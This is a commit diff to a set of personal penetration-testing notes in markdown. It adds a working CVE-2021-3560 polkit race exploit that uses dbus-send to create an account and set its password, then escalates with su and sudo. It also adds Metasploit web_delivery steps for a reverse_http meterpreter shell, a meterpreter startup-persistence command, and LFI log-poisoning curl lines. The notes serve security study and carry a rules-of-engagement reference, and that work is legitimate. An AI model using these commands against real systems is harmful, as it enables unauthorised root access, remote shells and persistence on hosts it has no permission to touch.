bump

exploit/linux/polkit.md

@@ -0,0 +1,24 @@
+# CVE-2021-3560
+
+* Exploit `< 0.105-26ubuntu1.1`
+
+
+## Racing Condition
+* Request creation of account via dbus message and `pkexec`. sleep time is variable.
+```sh
+dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
+```
+    * Create password via `openssl passwd -6 -salt salt password123`
+```sh
+dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
+```
+* Request is killed after polkits receives it
+
+* Polkit requests uid of user who sent the message, which has been deleted
+* Error will be thrown
+* Uid turns to root afterwards
+* Request succeeds
+
+* `su user1` and `sudo -s`
+
+

exploit/web/local_file_inclusion.md

@@ -1,6 +1,8 @@
 # Local File Inclusion
 To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
 
+* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
+
 ## Usage
 
 * Exploit URL parameter by including other files.
@@ -28,3 +30,4 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
     ```HTTP
     curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
     ```
+

pentesting.md

@@ -1,4 +1,11 @@
-# Methodology
+# Pentesting
+Authorized audit of security systems of computers and networks.
+* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
+    * Permissions
+    * Scope
+    * Rules
+
+## Methodology
 
 * Steps
     * Reconnaissance
@@ -8,7 +15,7 @@
     * Covering Tracks
     * Reporting
 
-## Reconnaissance
+### Reconnaissance
 * Duck / SearX / metacrawler / google
 * Wikipedia
 * [Shodan.io](http://www.shodan.io)
@@ -19,7 +26,7 @@
 * builtwith.com
 * wappalyzer
 
-## Enumeration
+### Enumeration
 * nmap
 * nikto
 * gobuster
@@ -27,16 +34,24 @@
 * metasploit
 * enum4linux / linpeas / winpeas / linenum
 
-## Exploitation
+### Exploitation
 
-## Privilege Escalation
+### Post Exploitation
+* Pivoting
+#### Privilege Escalation
+* Vertically or horizontally
 
-## Covering Tracks
+#### Covering Tracks
 
-## Reporting
+#### Reporting
 * Includes
     * Vulnerabilities
     * Criticality
     * Description
     * Countermeasures 
     * Finding summary
+
+## Frameworks
+* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
+* [NIST](https://www.nist.gov/cyberframework)
+* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)

persistence/meterpreter.md

@@ -0,0 +1,6 @@
+# Meterpreter Persistence
+
+## Load shell on system startup
+```sh
+run persistence -X
+```

post_exploitation/docs/metasploit.md

@@ -48,3 +48,13 @@ run post/windows/gather/hashdump
 load kiwi
 lsa_dump_sam
 ```
+
+### Webdelivery
+```sh
+use exploit/multi/script/web_delivery
+show targets
+set LPORT <attacker-Port>
+set PAYLOAD windows/meterpreter/reverse_http
+run -j
+```
+* Copy into powershell/cmd